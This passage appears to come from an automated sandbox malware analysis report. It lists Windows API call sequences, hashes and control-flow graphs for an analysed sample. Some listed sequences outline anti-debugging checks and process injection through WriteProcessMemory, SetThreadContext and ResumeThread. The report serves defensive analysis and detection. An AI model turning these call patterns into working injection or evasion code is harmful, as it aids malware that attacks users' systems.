                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA2040
                                        • LoadLibraryExA.KERNELBASE(000000BB,00000000,00000000), ref: 00BA205C
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA2063
                                        • LoadLibraryExA.KERNELBASE(000000BB,00000000,00000000), ref: 00BA207C
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA2083
                                        • RtlCreateQueryDebugBuffer.NTDLL(00000000,00000000), ref: 00BA2092
                                        • GetCurrentProcessId.KERNEL32(00000014,00000000), ref: 00BA209D
                                        • RtlQueryProcessDebugInformation.NTDLL(00000000), ref: 00BA20A4
                                        • OutputDebugStringA.KERNEL32(00BA8814), ref: 00BA20BB
                                        • Sleep.KERNEL32(00000064), ref: 00BA20C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc$Debug$ProcessQuery$BufferCreateCurrentInformationOutputSleepString
                                        • String ID: l.dl$ntdl
                                        • API String ID: 804534587-1236859653
                                        • Opcode ID: d27e271798b69598962eb67fad9d6082e486116602ca8cc92f1954e23183a61d
                                        • Instruction ID: 7b13d3cb3f6d0e314ec768bd614721f8693a168e6e304e81beac12712f551e57
                                        • Opcode Fuzzy Hash: d27e271798b69598962eb67fad9d6082e486116602ca8cc92f1954e23183a61d
                                        • Instruction Fuzzy Hash: 307137B11083809FD760DF64985AB5BBBE4FB8A714F508D0DF2D68A2A1DB358905CB63

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00BA1C70: GetVersionExA.KERNEL32 ref: 00BA1C94
                                        • MessageBoxIndirectA.USER32(00000000), ref: 00BA212A
                                        • MessageBoxExA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA213A
                                        • EndDialog.USER32(00000000,00000000), ref: 00BA2144
                                        • SendDlgItemMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00BA2154
                                        • ExitProcess.KERNEL32 ref: 00BA215C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DialogExitIndirectItemProcessSendVersion
                                        • String ID:
                                        • API String ID: 3504329115-0
                                        • Opcode ID: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
                                        • Instruction ID: e237a94bdd837a8066ac5d801f9d199556e68e124c672510adbb66228d11aa58
                                        • Opcode Fuzzy Hash: e5bd88c072c10ba258250c50b690bd9ae3581ff3becc3d4ab6d460b37c0c2afa
                                        • Instruction Fuzzy Hash: D2213C337AC2026BEB5CEF749D27B7F26D79B06611F42C87EA207CA0D1ED709404465A

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA17D2
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA17D9
                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00BA17F2
                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,?,00000000), ref: 00BA183A
                                        • WriteProcessMemory.KERNELBASE(00000000,?,-00000034,00000004,00000000,?,?,00000000), ref: 00BA186F
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18A4
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA18AB
                                        • Wow64SetThreadContext.KERNEL32(00000004,?,?,?,00000000), ref: 00BA18B7
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18E2
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA18E9
                                        • ResumeThread.KERNELBASE(00000004,?,?,00000000), ref: 00BA18F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadMemoryProcProcessWrite$Thread$ContextResumeWow64
                                        • String ID:
                                        • API String ID: 3183956845-0
                                        • Opcode ID: d69a18e68a37864fbaa6a7f216b17903493c36381d196e3c5f0ecaaa62adea17
                                        • Instruction ID: b69003dfd34aeb9165c552410dc2f0dd134b9cae6109dceaf9407b51c875795a
                                        • Opcode Fuzzy Hash: d69a18e68a37864fbaa6a7f216b17903493c36381d196e3c5f0ecaaa62adea17
                                        • Instruction Fuzzy Hash: 69417F71108301AFD364DB64CC89FABB3E9EB89710F508D5CF29AC7191DB34A845C762

                                        Control-flow Graph

                                        APIs
                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,?,00000000), ref: 00BA183A
                                        • WriteProcessMemory.KERNELBASE(00000000,?,-00000034,00000004,00000000,?,?,00000000), ref: 00BA186F
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18A4
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA18AB
                                        • Wow64SetThreadContext.KERNEL32(00000004,?,?,?,00000000), ref: 00BA18B7
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA18E2
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA18E9
                                        • ResumeThread.KERNELBASE(00000004,?,?,00000000), ref: 00BA18F4
                                        • LoadLibraryExA.KERNELBASE(D5C9DED0,00000000,00000000), ref: 00BA191F
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1926
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA1934
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc$MemoryProcessThreadWrite$ContextFreeResumeVirtualWow64
                                        • String ID:
                                        • API String ID: 1726148318-0
                                        • Opcode ID: 1473b19d8cb2c3888e2147cf74ace72cf48d8ff1206f8c17138d3331a5090021
                                        • Instruction ID: 6e7be3f876f656ba3ca534c5e0ab09f3c064803f0a0f94ea40813ae42e30ffce
                                        • Opcode Fuzzy Hash: 1473b19d8cb2c3888e2147cf74ace72cf48d8ff1206f8c17138d3331a5090021
                                        • Instruction Fuzzy Hash: C8318D71108301AFD364DB64CC89FABB3E9FB89314F54895CF29AC7291DB34A445CB62

                                        Control-flow Graph

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 00BA2504
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BA2519
                                        • UnhandledExceptionFilter.KERNEL32(00BA7130), ref: 00BA2524
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00BA2540
                                        • TerminateProcess.KERNEL32(00000000), ref: 00BA2547
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
                                        • Instruction ID: 31477684e88f4f4d7b12601cd1be02b789d14066a292e1f330abedc49fff2d35
                                        • Opcode Fuzzy Hash: bca0bf1a1c12110a8c5036b5c5f5b26b6e4c1ec0d72c10ac06834da2dfbae318
                                        • Instruction Fuzzy Hash: 4B21EEB8948604EFD710DF68FD8A6857BE0FB4A320F50505AE90987360EFB05A84EF59
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: ad4eedcc763d1f903a4a212b3c9c4d433d3fc78637cf3049a47ff37fc03f603f
                                        • Instruction ID: 8d1cbe3cd1a8df65e07ce0c3e5af08668c488ba472199623c3989085f7fe6ad9
                                        • Opcode Fuzzy Hash: ad4eedcc763d1f903a4a212b3c9c4d433d3fc78637cf3049a47ff37fc03f603f
                                        • Instruction Fuzzy Hash: 09313231F183244BDA78D76CD85276EB3D5EB9A361FC54CBAE4C9CB281E5398C448782
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                        • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                        • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                        • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 128 ba3595-ba35a7 GetModuleHandleW 129 ba35a9-ba35b1 call ba32e2 128->129 130 ba35b2-ba35fa GetProcAddress * 4 128->130 132 ba35fc-ba3603 130->132 133 ba3612-ba3631 130->133 132->133 135 ba3605-ba360c 132->135 136 ba3636-ba3644 TlsAlloc 133->136 135->133 137 ba360e-ba3610 135->137 138 ba364a-ba3655 TlsSetValue 136->138 139 ba370b 136->139 137->133 137->136 138->139 140 ba365b-ba36a1 call ba25f4 EncodePointer * 4 call ba3a0c 138->140 141 ba370d-ba370f 139->141 146 ba36a3-ba36c0 DecodePointer 140->146 147 ba3706 call ba32e2 140->147 146->147 150 ba36c2-ba36d4 call ba4f5a 146->150 147->139 150->147 153 ba36d6-ba36e9 DecodePointer 150->153 153->147 155 ba36eb-ba3704 call ba331f GetCurrentThreadId 153->155 155->141
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00BA235C), ref: 00BA359D
                                        • __mtterm.LIBCMT ref: 00BA35A9
                                          • Part of subcall function 00BA32E2: DecodePointer.KERNEL32(00000004,00BA370B,?,00BA235C), ref: 00BA32F3
                                          • Part of subcall function 00BA32E2: TlsFree.KERNEL32(00000002,00BA370B,?,00BA235C), ref: 00BA330D
                                          • Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00BA370B,?,00BA235C), ref: 00BA3A73
                                          • Part of subcall function 00BA32E2: _free.LIBCMT ref: 00BA3A76
                                          • Part of subcall function 00BA32E2: DeleteCriticalSection.KERNEL32(00000002,76EF5810,?,00BA370B,?,00BA235C), ref: 00BA3A9D
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BA35BF
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BA35CC
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BA35D9
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BA35E6
                                        • TlsAlloc.KERNEL32(?,00BA235C), ref: 00BA3636
                                        • TlsSetValue.KERNEL32(00000000,?,00BA235C), ref: 00BA3651
                                        • __init_pointers.LIBCMT ref: 00BA365B
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA366C
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3679
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3686
                                        • EncodePointer.KERNEL32(?,00BA235C), ref: 00BA3693
                                        • DecodePointer.KERNEL32(00BA3466,?,00BA235C), ref: 00BA36B4
                                        • __calloc_crt.LIBCMT ref: 00BA36C9
                                        • DecodePointer.KERNEL32(00000000,?,00BA235C), ref: 00BA36E3
                                        • GetCurrentThreadId.KERNEL32 ref: 00BA36F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3698121176-3819984048
                                        • Opcode ID: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
                                        • Instruction ID: 4f11bc8fa9b280f1c531659781a39aa058b0c47e0b1ee7d7505a2adfcfd418cf
                                        • Opcode Fuzzy Hash: 9fb36df3b225abf917b687709a6bba0f4b85389b51360a7d3be232c680292001
                                        • Instruction Fuzzy Hash: 2E311871D4C210AAC761AF78AC0AA1A3FE4FB57B61B1045AAF414D32B4EF748940CF69

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BA88C0,00000008,00BA3427,00000000,00000000,?,00BA28EB,00000003), ref: 00BA3330
                                        • __lock.LIBCMT ref: 00BA3364
                                          • Part of subcall function 00BA3B86: __mtinitlocknum.LIBCMT ref: 00BA3B9C
                                          • Part of subcall function 00BA3B86: __amsg_exit.LIBCMT ref: 00BA3BA8
                                          • Part of subcall function 00BA3B86: EnterCriticalSection.KERNEL32(?,?,?,00BA3369,0000000D,?,00BA28EB,00000003), ref: 00BA3BB0
                                        • InterlockedIncrement.KERNEL32(00BA9320), ref: 00BA3371
                                        • __lock.LIBCMT ref: 00BA3385
                                        • ___addlocaleref.LIBCMT ref: 00BA33A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                        • String ID: KERNEL32.DLL
                                        • API String ID: 637971194-2576044830
                                        • Opcode ID: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
                                        • Instruction ID: 65036895dc877b88cb193361d6f4b791ecbaa6cbc46a09f5207ccca701533cb6
                                        • Opcode Fuzzy Hash: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
                                        • Instruction Fuzzy Hash: C80161B144CB009FD720AF65D806749FBE0AF52721F10898DF496977A0CFB4AA44CB14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 175 ba49bb-ba49d6 call ba3730 call ba344c 180 ba49d8-ba49dc 175->180 181 ba49f5-ba4a0d call ba3b86 175->181 180->181 183 ba49de 180->183 186 ba4a0f-ba4a11 181->186 187 ba4a45-ba4a51 call ba4a56 181->187 185 ba49e1-ba49e3 183->185 188 ba49ed-ba49f4 call ba3775 185->188 189 ba49e5-ba49ec call ba286c 185->189 190 ba4a2d-ba4a3f InterlockedIncrement 186->190 191 ba4a13-ba4a1c InterlockedDecrement 186->191 187->185 189->188 190->187 191->190 195 ba4a1e-ba4a24 191->195 195->190 199 ba4a26-ba4a2c call ba4e7c 195->199 199->190
                                        APIs
                                        • __getptd.LIBCMT ref: 00BA49C7
                                          • Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
                                          • Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C
                                        • __amsg_exit.LIBCMT ref: 00BA49E7
                                        • __lock.LIBCMT ref: 00BA49F7
                                        • InterlockedDecrement.KERNEL32(?), ref: 00BA4A14
                                        • _free.LIBCMT ref: 00BA4A27
                                        • InterlockedIncrement.KERNEL32(02C71660), ref: 00BA4A3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
                                        • Instruction ID: f00341591ab9248757cb41007319901de1e56ab9d7bd18d9429514e90bccfb97
                                        • Opcode Fuzzy Hash: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
                                        • Instruction Fuzzy Hash: CA016D72A4C721ABD721AB689806B9FB3E0EB87B21F040195F414676A2CFB45D80DBD5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 202 ba5d70-ba5d79 203 ba5d7b 202->203 204 ba5d86-ba5d8c 202->204 205 ba5d7e call ba5c5a 203->205 206 ba5d9b-ba5d9c 204->206 207 ba5d8e-ba5d99 call ba4e7c 204->207 210 ba5d83-ba5d85 205->210 209 ba5dce-ba5dd1 206->209 214 ba5de8-ba5dea 207->214 212 ba5d9e-ba5da0 209->212 213 ba5dd3-ba5ddf call ba3f85 call ba3fef 209->213 215 ba5da2 212->215 216 ba5da3-ba5db9 HeapReAlloc 212->216 228 ba5de5 213->228 215->216 218 ba5dbb-ba5dc1 216->218 219 ba5e19-ba5e1b 216->219 221 ba5e03-ba5e17 call ba3fef GetLastError call ba3fad 218->221 222 ba5dc3-ba5dcc call ba3f85 218->222 223 ba5de7 219->223 221->219 222->209 231 ba5deb-ba5e01 call ba3fef GetLastError call ba3fad 222->231 223->214 228->223 231->228
                                        APIs
                                        • _malloc.LIBCMT ref: 00BA5D7E
                                          • Part of subcall function 00BA5C5A: __FF_MSGBANNER.LIBCMT ref: 00BA5C73
                                          • Part of subcall function 00BA5C5A: __NMSG_WRITE.LIBCMT ref: 00BA5C7A
                                          • Part of subcall function 00BA5C5A: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00BA4F26,?,00000001,?,?,00BA3B11,00000018,00BA8930,0000000C,00BA3BA1), ref: 00BA5C9F
                                        • _free.LIBCMT ref: 00BA5D91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
                                        • Instruction ID: 446e706f0486d37425003de9031f07398d228627da88ef32c62dcaa9a64c6502
                                        • Opcode Fuzzy Hash: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
                                        • Instruction Fuzzy Hash: A811863284CA10AFCB312F74AC09A5A3AE5DF97761B2105B6F94896150DF318B4196A0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 248 ba52b7-ba52d2 call ba3730 call ba344c 253 ba52f6-ba5322 call ba3b86 call ba526a call ba5324 248->253 254 ba52d4-ba52d8 248->254 262 ba52e2-ba52e4 253->262 254->253 256 ba52da-ba52df call ba344c 254->256 256->262 263 ba52ee-ba52f5 call ba3775 262->263 264 ba52e6-ba52ed call ba286c 262->264 264->263
                                        APIs
                                        • __getptd.LIBCMT ref: 00BA52C3
                                          • Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
                                          • Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C
                                        • __getptd.LIBCMT ref: 00BA52DA
                                        • __amsg_exit.LIBCMT ref: 00BA52E8
                                        • __lock.LIBCMT ref: 00BA52F8
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00BA530C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
